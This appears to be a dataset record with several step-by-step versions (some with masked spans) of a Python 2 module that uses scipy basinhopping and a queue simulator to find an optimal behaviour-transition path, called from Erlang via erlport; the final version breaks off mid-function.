"step-1": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if 
self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\n<mask token>\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. 
(With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-2": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if 
self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n 
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) 
of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-3": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if 
self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n 
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) 
of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-4": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = 
self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return 
paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) 
of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-5": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\nclass Bounds(object):\n '''Required for acceptance testing in scipy.optimize.basinhopping'''\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs[\"x_new\"]\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n '''Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i'''\n funs = [lambda x: x[i + 1] - x[i] + c\n for i, c in enumerate(self.costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [lambda x: x[i] for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n\n # im matrix form\n n = len(self.costs)\n # -x_i <= 0\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n # tmax constraints\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n # cost constraints\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n-1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {\"slsqp\": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},\n \"cobyla\": [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n '''Return bounds as sequence'''\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\n\nclass Stepper(object):\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n 
